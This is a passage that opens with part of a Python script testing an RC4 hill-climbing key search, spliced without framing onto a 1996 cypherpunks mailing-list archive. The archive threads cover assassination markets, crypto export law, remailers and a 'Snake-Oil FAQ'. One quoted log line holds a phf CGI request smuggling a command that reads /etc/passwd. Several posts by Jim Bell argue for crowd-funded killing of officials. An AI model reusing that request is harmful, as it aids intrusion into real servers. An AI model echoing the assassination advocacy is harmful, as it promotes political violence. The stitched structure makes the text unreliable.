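    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


CIPHERTEXT = rc4(KEY, PLAINTEXT)


def flip_bits(key: bytes, positions) -> bytes:
    """Return a copy of key with the given bit positions inverted."""
    k = bytearray(key)
    for p in positions:
        k[p // 8] ^= 1 << (p % 8)
    return bytes(k)


def printable_fraction(buf: bytes) -> float:
    """Assumed 'non-randomness' score: share of printable ASCII bytes."""
    return sum(32 <= b <= 126 for b in buf) / len(buf)


def avalanche_fraction(key: bytes, nbytes: int = 256) -> float:
    """Mean fraction of keystream bits that change when one key bit flips."""
    base = rc4(key, bytes(nbytes))
    changed = 0
    for bit in range(len(key) * 8):
        other = rc4(flip_bits(key, [bit]), bytes(nbytes))
        changed += sum(bin(a ^ b).count("1") for a, b in zip(base, other))
    return changed / (len(key) * 8 * nbytes * 8)


def score_by_distance(key, ciphertext, distances, trials=32, seed=1996):
    """Mean score of trial decryptions with keys d bit flips from the real key."""
    rng = random.Random(seed)
    nbits = len(key) * 8
    result = {}
    for d in distances:
        scores = [
            printable_fraction(
                rc4(flip_bits(key, rng.sample(range(nbits), d)), ciphertext))
            for _ in range(trials)
        ]
        result[d] = sum(scores) / trials
    return result


def hill_climb(ciphertext, key_len=16, rounds=200, seed=1996):
    """The proposed loop: five mutations per round, keep the best scorer."""
    rng = random.Random(seed)
    key = b"a" * key_len  # arbitrary starting key, as in the proposal
    best = printable_fraction(rc4(key, ciphertext))
    for _ in range(rounds):
        mutants = [flip_bits(key, [rng.randrange(key_len * 8)])
                   for _ in range(5)]
        top_score, top_key = max(
            (printable_fraction(rc4(m, ciphertext)), m) for m in mutants)
        if top_score > best:
            key, best = top_key, top_score
    return key, best


if __name__ == "__main__":
    print("keystream bits changed per key-bit flip:",
          round(avalanche_fraction(KEY), 3))
    for d, s in score_by_distance(KEY, CIPHERTEXT, [0, 1, 2, 8, 64]).items():
        print(f"key distance {d:2d} bits -> mean score {s:.3f}")
    found, best = hill_climb(CIPHERTEXT)
    print("hill climber best score:", round(best, 3),
          "| recovered key:", found == KEY)
```

A key one bit away from the right one scores the same as a key 64 bits away, so the scoring function gives the climber nothing to follow; only distance 0 stands out.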
From jf_avon at citenet.net Sun Sep 22 16:54:51 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Mon, 23 Sep 1996 07:54:51 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: <9609222138.AB13535@cti02.citenet.net> On 22 Sep 96 at 9:36, jim bell wrote: > >Where is Jimmy Hoffa? > > And it worked! Hey Jim, makes me a bit nervous when you talk that tripe. Unions were using guns and they still do, although the hand holding it now is the govt. But I suppose that you were answering only on a strictly factual basis. Ciao jf P.S. send any comments to me directly, as I am not on CPunks anymore. So many things to do, so little time... ...sigh... Jean-Francois Avon, Montreal QC Canada DePompadour, Societe d'Importation Ltee Finest Limoges porcelain and crystal JFA Technologies, R&D consultant physicists and engineers, LabView programming PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From azur at netcom.com Sun Sep 22 17:04:32 1996 From: azur at netcom.com (Steve Schear) Date: Mon, 23 Sep 1996 08:04:32 +0800 Subject: Internet File System? Message-ID: >The other day, it occurred to me that Java could really take off if there >was some sort of file system. And, since you can't write to local files >with Java, the obvious solution is to set up the 'fopen, fclose(), etc) >set of functions that are 'rpcs' to some server application on the same >computer as the web server the applet comes from. > >Since I never manage to come up with new concepts, I assume someone is already >working on this, or has already created this. > Eric Hughes, well known cypherpunk, presented a two-part paper at DEFCON IV. The first part of the paper, entitled the "Universal Piracy System" or UPS, addresses an Internet/Web file system which offers universal access and privacy. 
The second part addresses how the UPS can be the enabler for the demise of copyright while offering a market driven replacement of an entirely different character. I hear Eric is refining these ideas and we hope to see something published soon. Perhaps he's lurking and will respond. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to prescription DRUGS. From aba at dcs.ex.ac.uk Sun Sep 22 17:15:19 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Mon, 23 Sep 1996 08:15:19 +0800 Subject: crypto anarchy vs AP Message-ID: <199609221810.TAA00172@server.test.net> Been reading the AP thread, and thought I'd donate some of my views. To me, crypto anarchy is a means to achieve a more libertarian government, it is a pivotal tool to reduce government power, and enable freedom and privacy. A libertarian government means a less powerful government, less taxes, less onerous laws, more freedoms. I don't think AP as stated by Jim could escalate quickly enough as a mechanism to introduce a libertarian government, because if it got to the state that too many politicians were openly threatened, and killed, the government would declare a state of war, and switch off the Internet. You'd just cause the government to panic, and this would have negative effects, it would take ages for them to calm down, and the laws they'd pass in the mean time would mean a near certainty of mandatory GAK as a condition to switching the Internet back on. (Before someone takes me to task for the impossibility of switching the Internet off, it all depends on the level of government panic. 
More specifically perhaps they would disconnect key backbones, and ISPs briefly while they rushed into effect a few presidential decrees outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets, etc.) I think I understand what Jim is saying with AP, that it might be a way to accelerate the arrival of libertarian government. I'm not saying I have any moral problems with a suitably restrained version of AP, if it saved lives and resulted in a better life for many people. (Some people might even view it as having a certain element of poetic justice:-) However I don't think it would survive the above hurdle. (Also I have some thoughts on why AP might not achieve the desired effects even if it could survive the hurdle which I will save for now, in the interests of keeping this to a digestible length.) Libertarian governments, if they come, I think will be more easily, and more likely achieved via non-violent means. I think it will be a much more gradual process, and that government power will just be gradually eroded as international businesses gain power, and borders become more open, trade more free, as travel becomes cheaper, and moving to another country becomes less of a hassle. Telecommuting, and remote education should help reduce the problems of moving country. If you telecommute, and your kids (if you have any) are taught via the Net, and you can talk to your friends in photo realistic real time VR chat rooms, it becomes much less important where on the planet you live. As information based work becomes more important, significant proportions of government tax revenues may be siphoned off to tele-workers from tax havens, and to those who just ignore local tax laws in favor of anonymous ecash. The ability to jurisdiction shop for laws, and taxes in itself will reduce governments options. 
It will induce governments to try to provide incentives for international businesses to use their jurisdictions, and to create the appearance of as free a life style as they can for individuals. The jurisdiction shopping will start amongst the disenfranchised, and the adventurous, but will spread as the advantages become clearer, and the hurdles are reduced. Tax collection will be restructured to tax tangibles, and reduced to encourage customers (citizens). Governments are currently flailing around trying to prolong the inevitable. The fall out from this is beginning to annoy some people. If it annoys enough people soon enough that they vote in a Libertarian candidate for president in the next 20 years, crypto anarchy, and libertarian governments could be reached more quickly. I'm not sure it will ever get that far though, because the more votes the libertarians get over the following years, the closer we get to libertarian anyway, because the government has to start adopting their policies to get the votes back. (Much like the green movement, which once it started getting significant votes, and media attention, was pandered to by politicians of all parties. They're all green now:-) And so libertarian thinking starts to affect government thinking. Crypto anarchy privacy preserving goodies such as anonymous ecash, anonymous email, strongly free speech, right to encryption start to fair better, and so start to undermine whats left of government. Politicians, now posturing to try and look more libertarian might even start to take on board the idea that there are simply too many government employees, that may be the war on drugs causes more problems than it solves, that sounding pro free speech is something that might carry some votes, etc. 
By the time governments get weak enough for AP to be feasible, they will be so weak, and eager to entice you into their jurisdiction with promised single digit tax rates, private dietary recommendation services, friendly police forces, advertised local highlights: local casinos, brothels, cuisine, favorable climate, reasonably priced housing, etc, etc. that no one will care much about offing the fawning officials (head salesmen, and brochure designer) anyway. Well thats my theory :-) It could all suffer a huge set-back if the government panics too soon, and passes mandatory GAK by presidential decree or something. One hopes that whats left of the US first ammendment, and judicial system would be enough to repeal such a move, but you never know. Adam -- #!/bin/perl -sp0777i Unfortunately, you've probably all received something that started out like this: >> You are being gently flamed because. Sorry about that. I've been gone for the last few days and found out that one of my incoming mail filters was somewhat flawed. Instead of sending that generic response only to the esteemed Dr. Vulis it was sending it to any message with his address *in the header*. It also replied to any cc:ed addresses. Ooops... Also, there is no need to speculate about any ulterior motives. It was entirely a setup glitch. There's an important reminder here: don't make setup changes at 2 am and then disappear for 4 days! Again, sorry to the list about this. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From perry at piermont.com Sun Sep 22 18:47:04 1996 From: perry at piermont.com (Perry E. 
Metzger)
Date: Mon, 23 Sep 1996 09:47:04 +0800
Subject: Evolving algorithm for faster brute force key searches?
In-Reply-To: <31DD74B1.BB3@iconn.net>
Message-ID: <199609222305.TAA08525@jekyll.piermont.com>

The problem with your idea, Jack, is that any decent crypto algorithm will change on average half the output bits when one bit of the key is changed. In other words, by definition, if you can do this, the algorithm isn't as strong as it should be.

However, you are correct that failures to meet this standard properly can be found in some popular algorithms. You might want to read Biham and Shamir's book on differential cryptanalysis for details.

jack writes:
> I got an idea last night, maybe this has already been thought of and
> tried, but I thought I would give a quick outline of the program I was
> thinking of:
>
> -Specify a maximum key size (assume 1024bits or something)
> -Start with an arbitrary key "aaaaaaaaaaaaaa"
>
> Start a loop
>
> -create five mutations of the key
> -use each key to try and decrypt a few bytes of the message
> -run a (or some) statistical analysis tests and come up with a value
> for how 'random' the decrypted bits are
> -Pick the key that produced the least random output
>
> Repeat
>
>
> Probably this wouldn't work on any very strong algorithm, but it seems it
> might be effective against some. I am going to write the code and try
> it out on RC4 and on a weakling little algorithm I wrote a while back.
> Let me know what y'all think.

From richieb at teleport.com Sun Sep 22 19:51:34 1996
From: richieb at teleport.com (Rich Burroughs)
Date: Mon, 23 Sep 1996 10:51:34 +0800
Subject: Bernstein hearing: The Press Release
Message-ID: <3.0b24.32.19960922171430.00685008@mail.teleport.com>

At 04:39 PM 9/21/96 -0800, Jim Bell wrote:
>At 02:03 PM 9/18/96 -0700, John Gilmore wrote:
[snip]
>>* Any legal framework that allows a government bureaucrat to
>>censor speech before it happens is an unconstitutional prior restraint.
>>The government is not allowed to set up such a drastic scheme >>unless they can prove that publication of such information will >>"surely result in direct, immediate, and irreparable damage to our >>Nation or its people" and that the regulation at issue is necessary >>to prevent this damage. > >At the risk of being a devil's advocate, let me suggest that you are >conceding too much even with the preceding paragraph. The 1st amendment >says nothing about preventing speech which (even admittedly) would result >in "direct, immediate, and irreparable damage to our nation or its people." [snip] Jim, that's a quote of Potter Stewart from the Pentagon Papers case, if I'm not mistaken. It's not written in the Constitution, but Supreme Court precedent is the next best thing as far as con law goes. >The way you've written the paragraph I've quoted above, it appears that you >are somehow acknowleding that there are certain circumstances where certain >types of speech are controllable because they are "harmful," but you fail to >explain how even this constitutional restiction is tolerable. Frankly, I >don't see it! What you need to do is to be far more specific about such >speech and exactly where it can be controlled. What you need to do is look at the case law :) The government can restrict speech in time, place or manner, according to the courts. Restricting content is more difficult, and places a much heavier burden on the gov. To expect people writing about and arguing the case to completely ignore the existing case law is foolish, IMHO. >I should point out, also, that this is the second time I've mentioned this. >You're doing us a disservice if you concede too much in this area. I think that John and EFF are doing us a huge service by their involvement in the case. I am very optimistic about the outcome of the Bernstein case. 
Judge Patel's ruling that source code = speech really puts the debate in the plaintiff's court, and we saw some of that in the hearing on Friday, IMHO.

Much of the argument was about prior restraint, with the government trying to claim that they are only trying to restrict a specific functionality of crypto code and not the ideas behind it. This seemed to be a fairly weak argument to me, and the plaintiff's attorney pointed out that the ideas embodied in the source code are what dictate the functionality.

The plaintiff's attorney (Cindy Cohn) also argued 3 lines of cases that bear on the issue:

1) Compelled speech.
2) Anonymity.
3) Freedom of association.

Cohn also argued that the statute is vague (terms like "general principle" and "fundamental research") and overbroad; also that the current version of ITAR does not even meet the scrutiny of the DOJ's own OLC review of the statute.

When the attorney for the gov tried to drift back to the issue of whether source code is speech, Judge Patel said, "You'll get that chance again in another court with more judges."

Near the end of the hearing, the government attorney stated that the statute describes "what is not controlled," which elicited a pretty hearty laugh from the spectators. Not a real strategic admission.

The plaintiff's brief is at:
http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/Legal/960726_filing/motion_partsj.html

There's quite a bit of info in that same directory.

Rich
______________________________________________________________________
Rich Burroughs richieb at teleport.com http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause

From adam at homeport.org Sun Sep 22 20:00:23 1996
From: adam at homeport.org (Adam Shostack)
Date: Mon, 23 Sep 1996 11:00:23 +0800
Subject: Macintosh Mixmaster port...
Who's doing it? In-Reply-To: <3.0b19.32.19960922162606.006c1644@ricochet.net> Message-ID: <199609230120.UAA01100@homeport.org> Greg Broiles wrote: | At 03:16 PM 9/22/96 -0500, Adam Shostack wrote: | | > A real Mac port of Mixmaster, that integrated with Claris | >EMailer and Eudora would be a huge boon to the millions of Mac users | >out there. I have no doubt that Vinnie's mac crypto conference talked | >a lot about this sort of thing. | | Actually, the Mac crypto conference didn't spend any time at all on | Mixmaster - which is not intended as a criticism of either the conference | or of Mixmaster, but it just didn't happen. (By this sort of thing, I was refering more to the privacy apps 'integrated with Claris EMailer and Eudora,' which you go on to discuss. I think that a remailer client needs to be integrated with the usual mail tools, not seperate.) | I gave a very short talk and said that I thought the Mac needed three apps, | for people who wanted to jump in a write something useful to the cause of | privacy on the net and didn't want to reinvent any wheels: a remailer | client with a good user interface, a Mac-native remailer, and an | implementation of DC-nets. Mixmaster would, of course, address two of those | three. Lucky tells me that there is already a Mac implementation of | DC-nets, but it doesn't seem to be very well known. I don't know of any DC net implementation, and would be really eager to hear Lucky expound on this. | For what it's worth, I think future remailer/Mixmaster development might do | well in Java. I'm not especially sold on or trusting of the alleged | security or trustability features of Java (sorry, no offense) but I *do* | think it's a neat tool for building non-machine specific network aware | applications. Ignore the fact that people use it to build silly animations | or that downloadaded applets may or may not be secure - it's still useful | as a development tool. 

I agree, especially if we write a protocol that allows a user to connect to a mixmaster, get a pool of messages, and remail them on to their destination, along with a message of his own. (This is a half baked idea; there are obvious denial of service issues, as well as reliability issues in the well intentioned cases.)

Adam

--
"It is seldom that liberty of any kind is lost all at once."
 -Hume

From shamrock at netcom.com Sun Sep 22 20:13:53 1996
From: shamrock at netcom.com (Lucky Green)
Date: Mon, 23 Sep 1996 11:13:53 +0800
Subject: Macintosh Mixmaster port... Who's doing it?
In-Reply-To: <3.0b19.32.19960922162606.006c1644@ricochet.net>
Message-ID:

On Sun, 22 Sep 1996, Greg Broiles wrote:

> Lucky tells me that there is already a Mac implementation of
> DC-nets, but it doesn't seem to be very well known.

There is an Apple(Local?)Talk implementation of DC nets. Somebody please check the Eurocrypt proceedings of the late 80's.

--Lucky

From sbrath at froglit.scitele.com Sun Sep 22 20:18:17 1996
From: sbrath at froglit.scitele.com (Shane Brath)
Date: Mon, 23 Sep 1996 11:18:17 +0800
Subject: Go away CIA
In-Reply-To:
Message-ID:

On Sat, 21 Sep 1996, Wearen Life wrote:

> I won't be surprised if they were ALSO watching who was visiting your page.
> I think now is the time to start looking in your hard drive or floppy
> disk for anything that may incrimanate you. (did i spell that right)? My 2 cents. But how would they go about globally watching who goes to your URL, unless they hack into your server and look at the log, or have a network sniffer at an access point feeding you?

> > Well well...
> >
> > After putting up the CIA hack mirror page on http://www.skeeve.net/cia/
> > I learnt a few things.
> >
> > o it got 50,000 hits in 1 day
> > o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov
> > department looked at it masses of times. The CIA looked at it every 10-15
> > minutes.
> > zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l
> > 281
> >
> > o Even the CIA tries to hack you.
> >
> > relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180
> >
> > o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and
> > ncsc.mil sites.

[ rest of text snipped ]

From Kevin.L.Prigge-2 at tc.umn.edu Sun Sep 22 20:27:36 1996
From: Kevin.L.Prigge-2 at tc.umn.edu (Kevin L Prigge)
Date: Mon, 23 Sep 1996 11:27:36 +0800
Subject: Spam from Timmy May (fart) and his merry band of mailbombers
In-Reply-To: <5saouD5w165w@bwalk.dm.com>
Message-ID: <3245dfcc3e29002@noc.tc.umn.edu>

Dr.Dimitri Vulis KOTM said:
> Is this another one of Tim May's accounts?
>
> ]From varange at crl.com Sun Sep 22 15:39:37 1996

Gee, Larry^H^H^H^H^HDimitri, the proper word is tentacle. As you might recall, we're all just tentacles of TC May.

--
Kevin L. Prigge             | "I rarely saw people sitting at
Systems Software Programmer | computers producing real code
Internet Enterprise - OIT   | wearing ties." - Philippe Kahn
University of Minnesota     | (speech at Software Development '90)

From bdavis at thepoint.net Sun Sep 22 20:34:56 1996
From: bdavis at thepoint.net (Brian Davis)
Date: Mon, 23 Sep 1996 11:34:56 +0800
Subject: Death Threats
In-Reply-To:
Message-ID:

...

On Sat, 21 Sep 1996, Timothy C. May wrote:

>
> Hey, I'm a candidate for President, too (at least I know of someone who
> plans to vote for me). Does this mean I am protected against various
> threats, and veiled threats? Let me know, as I seem to be under attack by
> certain Russian-developed spambots.
>
> More seriously, the whole set of protections the President has is
> inconsistent with our nominally anti-royalist approach. Of course, America
> long ago created its own royalty. Even dynasties (how else do you explain
> Teddy Kennedy getting away with the Mary Jo Kopechne thing?).
>
> Actively (and plausibly) threatening _anyone_ is a kind of crime (*), but
> there is no reason to make special laws covering certain persons.

The law specifically criminalizing threats against the President (and other specified persons) gives federal authorities jurisdiction to investigate the cases, which frequently have interstate connections. It is relatively difficult for a state to investigate and prosecute an interstate case.

That's not the only reason for the law, though.

EBD

> (* Why do I say "actively (and plausibly) threatening _anyone_ is a kind of
> crime"? Don't I believe in free speech? Well, if I hear that Vladimir G.
> Nulis says I should be killed, and that he is coming to California to take
> care of this, I have no compunctions, libertarian or otherwise, about
> shooting first at the first sign of his appearance on my property.
> Understandably, the government does not wish this to happen. Thus, I have
> no problem with illegalizing direct and concrete threats. General threats,
> such as "all lawyers should be taken out into the parking lot and garotted"
> are not specific, direct, and concrete, and hence fall under the free
> speech provisions.)
>
> --Tim May
>
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May               | Crypto Anarchy: encryption, digital money,
> tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
>
>
>
>
>

From dthorn at gte.net Sun Sep 22 20:48:47 1996
From: dthorn at gte.net (Dale Thorn)
Date: Mon, 23 Sep 1996 11:48:47 +0800
Subject: Timmy May's spam (Was: Re: CIA hacked)
In-Reply-To:
Message-ID: <3245DFCA.6EAB@gte.net>

Dr.Dimitri Vulis KOTM wrote:
> Adam Back writes:
> > It would seem to me that the first insults were thrown by yourself,
> > and that your strange habit of bouncing all the fallout to the list
> > is perpetuating the problem.
> > No. Let me remind you the sequence of events, in chronological
> > order:

[some discussion deleted]

> > Also, I would point out that you yourself don't restrict yourself to
> > purely crypto discussions (aside from this latest war), you for
> > instance recently discussed driving licenses in NY. Not that I am
> > Right - the discussion of drivers licences and other credentials is
> > definitely crypto-relevant. The discussion, e.g., of the ethics of
> > mandatory insurance is not.

[more discussion deleted]

I just want to add a comment about the "ethics of mandatory insurance". If one were to assume that the state mandating insurance, seat belts, and so on was motivated by genuine concern for the people, then OK (if that's what you want to think). OTOH, since the true motivations are not public knowledge (for the average person), and since some of these are things for which the police can check you out and inspect you more closely, they might be relevant after all, or at least as relevant as some of the other topics.

From jimbell at pacifier.com Sun Sep 22 20:49:20 1996
From: jimbell at pacifier.com (jim bell)
Date: Mon, 23 Sep 1996 11:49:20 +0800
Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE]
Message-ID: <199609230102.SAA01161@mail.pacifier.com>

At 12:38 PM 9/22/96 -0400, hallam at vesuvius.ai.mit.edu wrote:
>
>I agree with Bill, AP sounds like a very good club for the Exon types
>to beat us with.

But they're not doing it. They know about it, but they're NOT using it. This should tell you something.
This really is no surprise to me; before I started publicizing AP, I tried to carefully consider whether letting the cat out of the bag was going to assist the government in stopping it. My conclusion was that they didn't stand a chance. If anything, they're afraid of publicizing the idea, because their opposition to it can look only self-serving.

>Jim's latest comments sounded no different to me than the mealy mouthed
>"understanding" messages that Sinn Fein publish about the IRA. Given
>the opportunity to condemn any attack on the President under AP rules
>we get a non committal non-condemnation. It's the type of thing that Gerry
>Adams says after his men have just killed two kids with a bomb in a litterbin
>outside a McDonald's.

Don't try to tar me with that brush. I made it clear long ago that I'm opposed to truly random attacks on ordinary citizens. However, I hasten to add that I'd very much prefer that these attacks be re-targeted against the people who deserve them. However, I usually find that the people who make the biggest deal about disliking random citizen attacks are the ones who recommend replacing them with...nothing...and have no plan to solve the problems with any other method, violent or otherwise.

[doctrinaire BS deleted]

>As the Marxist ideologues got frustrated by their evident lack of progress
>they turned to terrorism. The Baader-Meinhof gang believed that they could
>spark the revolution by jolting society out of its complacency. Their
>strategy was remarkably like AP.

Somehow, I doubt it. Anybody who thinks an AP-like system would be effective for bringing in his pet communist (or fascist, or monarchist, or anything other than pure-anarchic) government is an idiot. AP is fundamentally anti-hierarchical in its leanings and effects.

>If the heads of large corporations were
>likely to be assassinated then no one would want to lead a large firm.

Who said companies need "leaders"? Remember, I said AP is anti-hierarchical.
Any hierarchies, particularly those forced on people, are strongly deterred. This includes social and religious hierarchies, BTW. Even corporate hierarchies would only exist if approved-of by the vast majority of the shareholders, most of whom will be the workers as well.

> In
>fact as any person with counter terrorism experience will tell you the
>threat of death is remarkably ineffective as a means of intimidation. It
>creates the opposite effect, strengthening the resolve of the target. I
>discussed this point recently with someone close to Mossad who agreed.

Under a set of circumstances similar to the status quo, that is not surprising. But that can change. That WILL change. People occupy positions of authority when they feel, personally, they are better off doing so than not. Give the average member of the public (not merely crazed "terrorists") the opportunity to remove those people, and you won't be able to keep them around. I mean, presumably they do their job for a salary and benefits, right? How many bombs or bullets will they tolerate, rather than resigning and taking a safer job?

>Terrorism is becoming an increasing concern. The amount of damage an
>individual can cause is much greater than that possible in the past.

If anything, I think the advantage of AP is that it REDUCES the amount of damage that any given person has to cause, per citizen, to achieve his anti-government political ends. I've pointed out that it would only take a penny or two from each citizen, on average, to remove one of even the highest-level US officeholders. Far less than that if you include resignations. What I'm advocating is a system that makes it impossible for agents of the status quo to resist the opposition of the public, which is unlike the current system. Rather than have to build a bomb, or wait for somebody else to do so, the ordinary citizen only needs to make a modest contribution to the "revolution fund."
And today, an officeholder can claim to resist "terrorism" based on the fact that he opposes the extreme action of a handful of people. What happens when they have to admit that a million people paid for that gun to be fired or that bomb to be planted?

>There
>are plenty of exhausted ideologies about which can be fashioned into
>a justification of murder.

Don't blame me for them.

> Jim's post shows very clearly how Libertarianism
>can be converted into a justification for terrorism. It's a very short gap
>between being opposed to government and actively fighting against it.

What, exactly, is the MEANING of "being opposed to government"? If you pay taxes to support that government (even if that support is not voluntary) those taxes mean that you are indeed acting to strengthen that government and assist its efforts. I suggest that you can't realistically claim "opposition to government" (other than rhetorical) under these circumstances.

>I see libertarianism as the exhausted remnant of the mercantilism of the
>1980s. As constructed it recognises only those rights which favour the
>privileged in society and none of those which benefit the economically
>disadvantaged. Politically it reached its peak influence almost a decade
>ago when Reagan and Thatcher were at their zenith. The '94 congress will
>probably be seen as the turning point in the political tide with the mainstream
>of politics moving back to the left again. There will always be people around
>who conclude that the failure was not being close enough to the ideology.

You've already made it clear you don't consider yourself a libertarian. Why go on with this stuff?

>If the libertarians are not careful they will be inexorably linked in the public mind
>with the terrorists who act in their name.

I think the stereotypical "terrorist" doesn't really claim to "act in their [the public's] name." The one recent counter-example that I've heard of, that of the EPR in Mexico, is a very welcome exception.
If anything, I think the governments of the world are truly frightened that "terrorism" as commonly practiced will change from the "blow up random airliner" mode, passing through the "blow up nearby government building" mode, to "find and kill a particular official" mode. Far less collateral damage, far harder to whip up public opposition to in the press, etc.

Jim Bell
jimbell at pacifier.com

From cjh at osa.com.au Sun Sep 22 20:54:27 1996
From: cjh at osa.com.au (cjh at osa.com.au)
Date: Mon, 23 Sep 1996 11:54:27 +0800
Subject: (Fwd) Australian "ITAR" regulations
In-Reply-To: <199609191322.AA02162@minbne.mincom.oz.au>
Message-ID: <199609230132.LAA08960@rosella.osa.com.au>

Peter Trei writes:
> Forwarded from the cypherpunks list...
> http://www.austlii.edu.au/cgi-bin/sinodisp.pl/au/legis/cth/consol_reg/cer439/sch13.html?query=cryptographic

Thanks for posting this URL Peter. Of particular note is the heading:

> 43. Other goods as follows:

An anonymous opinion from inside the Defence Dept holds that electronic bits on a wire do not constitute goods, and as a result if you ship electronically, you are not subject to the regulations. If you ship a CD or floppy or other physical media containing software, you violate the regulations.

I'll add this to the SSLeay legality FAQ - standard disclaimers apply of course, obtain professional legal advice before exporting SSLeay.

------------------------------------------------------------
Clifford Heath                    cjh at osa.com.au
Open Software Associates Limited
29 Ringwood Street / P O Box 401  Phone +613 9871 1694
Ringwood VIC 3134 AUSTRALIA       Fax +613 9871 1711
------------------------------------------------------------
Deploy Applications across the Internet and Intranets!
Visit our Web site at http://www.osa.com

From loki at infonex.com Sun Sep 22 21:00:38 1996
From: loki at infonex.com (Lance Cottrell)
Date: Mon, 23 Sep 1996 12:00:38 +0800
Subject: Snake-Oil FAQ
In-Reply-To: <199609220854.DAA27487@mailhub.amaranth.com>
Message-ID:

At 9:44 AM -0700 9/22/96, Dale Thorn wrote:
>The basic outline for any products included (and don't forget, just
>getting included is some sort of endorsement, if you know what I mean)
>could be a feature/bug listing, using common crypto terminology, and
>could be followed by side-by-side argument paragraphs from the author
>and from a reputable review panel.
>
>The usefulness of the list would probably depend on:
>1. The participation of all those names people like to name-drop on this
> forum.
>2. And/or the quality of the list itself if done without (1.) above.
> In this latter case, it could still be useful, but the variances in
> evaluation owing to personal bias would be difficult to overcome.

I like your suggestion for layout, and agree with your comments. It is my hope that "name" people will contact me. Once the site is ready, I will be sending out invitations to those who have not already contacted me. I am looking for a group of 10 or less people.

Any other suggestions, comments?

-Lance

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come."
 --Nietzsche
----------------------------------------------------------

From dthorn at gte.net Sun Sep 22 21:00:40 1996
From: dthorn at gte.net (Dale Thorn)
Date: Mon, 23 Sep 1996 12:00:40 +0800
Subject: Snake-Oil FAQ
In-Reply-To:
Message-ID: <3245E50C.4B10@gte.net>

Timothy C. May wrote:
> At 4:44 PM 9/22/96, Dale Thorn wrote:
> >The basic outline for any products included (and don't forget, just
> >getting included is some sort of endorsement, if you know what I
> >mean)
> >could be a feature/bug listing, using common crypto terminology, and
> >could be followed by side-by-side argument paragraphs from the author
> >and from a reputable review panel.
> >The usefulness of the list would probably depend on:
> >1. The participation of all those names people like to name-drop on
> >this forum.
> >2. And/or the quality of the list itself if done without (1.) above.
> > In this latter case, it could still be useful, but the variances
> >in evaluation owing to personal bias would be difficult to overcome.
> The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons
> most in need of it won't read it.
> If those who post descriptions of their "Unbreakable Virtual
> Whammo-Matic Really Complicated Transposition Cipher" have not
> bothered to read Schneier or other basic texts on ciphers, why would
> they bother to read a Snake Oil FAQ? This applies to their customers
> as well.

[additional text deleted]

Maybe I shouldn't have tried to (slightly) change the subject. It was my thought that someone could encourage the person(s) who wanted to do a Snake-Oil product list to generalize the list, to be a more scholarly reference, and not just a blacklist. Since the original(?) proposal concerned actual products, and not just techniques which fit into neatly identifiable categories, that might justify a Consumer Reports type of review list for these products.

From sryan at reading.com Sun Sep 22 21:19:05 1996
From: sryan at reading.com (steven ryan)
Date: Mon, 23 Sep 1996 12:19:05 +0800
Subject: Snake-Oil FAQ
Message-ID: <3.0b15.32.19960922214147.00551e40@reading.com>

At 05:27 AM 9/22/96 -0700, you wrote:
>My view is that people interested in buying and using crypto are either
>bright enough to learn, or are not.
>A "Snake Oil FAQ" is largely
>unnecessary, for either category. For the first, because they're bright.
>For the second, because they're not.

My view is that there is a large third group of people who are bright enough to learn, but don't have the time or inclination to read books or do extensive research on the subject.

There are a lot of people using PGP for the wrong reason, not because they read the books or did the research. Nor do they even understand how it works as opposed to how it is used. They are using it because they cruised the net and read good things about it or heard it was cool. A Snake Oil Faq could help prevent these people from choosing wrong products.

It would also be very helpful to have all the arguments in one place in one concise faq. Before I joined this list and read Applied Cryptography I was in a discussion in a previous job about securing one of our products. The programmer wanted to protect the key with a convoluted series of transpositions. I knew it was dumb but couldn't successfully argue the point why. A faq would have been helpful.

There are a lot of people with a casual interest in crypto who will remember that there is a faq on bad crypto. When the time comes they may be able to use those arguments to help avoid the use of bad crypto.

Steven

------------------------------------
Steven Ryan - Reading Access - sryan at reading.com
PGP Fingerprint: E8 A2 C5 A2 7A C4 77 93 0A 1B 1D C6 B9 2F 36 9B
Finger me for my PGP public key

From markm at voicenet.com Sun Sep 22 21:22:57 1996
From: markm at voicenet.com (Mark M.)
Date: Mon, 23 Sep 1996 12:22:57 +0800
Subject: Bernstein hearing: The Press Release
